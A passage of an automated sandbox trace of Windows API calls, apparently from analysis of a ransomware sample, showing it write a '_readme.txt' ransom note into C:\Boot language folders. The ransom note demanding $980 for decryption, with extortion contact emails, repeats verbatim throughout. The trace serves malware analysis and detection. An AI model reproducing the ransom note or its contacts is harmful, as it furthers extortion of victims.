hHeap=0x2c0000) returned 1 [0173.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.744] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0173.744] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.744] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.744] PathFindFileNameW (pszPath="") returned="" [0173.745] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.745] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.745] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.745] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.745] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0173.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.745] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0173.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.746] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.746] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.746] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.746] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.747] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.748] CloseHandle (hObject=0x690) returned 1 [0173.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.748] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e5978e0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5978e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.748] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e5978e0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5978e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.748] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.748] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e5978e0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e5978e0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5978e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.748] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e5978e0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e5978e0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5978e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.748] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.749] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.751] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0173.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.751] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.751] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.751] PathFindFileNameW (pszPath="") returned="" [0173.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.751] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.751] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.751] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8d2f0 [0173.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.752] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.752] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0173.752] RtlAllocateHeap 